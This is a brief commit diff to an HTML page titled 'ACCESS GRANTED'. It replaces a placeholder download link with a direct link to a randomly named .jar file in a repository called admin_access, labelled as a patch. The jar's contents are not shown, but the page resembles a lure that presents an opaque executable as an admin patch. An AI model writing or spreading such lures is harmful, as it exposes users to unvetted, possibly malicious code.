Update download link in accessgranted.html

--- a/accessgranted.html
+++ b/accessgranted.html
@@ -18,6 +18,6 @@
 <body>
   <h1>ACCESS GRANTED</h1>
   <p>Welcome, Administrator.</p>
-  <p><a href="https://github.com/YourName/YourMod/releases/latest">[ DOWNLOAD PATCH ]</a></p>
+  <p><a href="https://github.com/funymaniguess/admin_access/blob/main/file_ujqlpz.jar">[ DOWNLOAD PATCH ]</a></p>
 </body>
 </html>
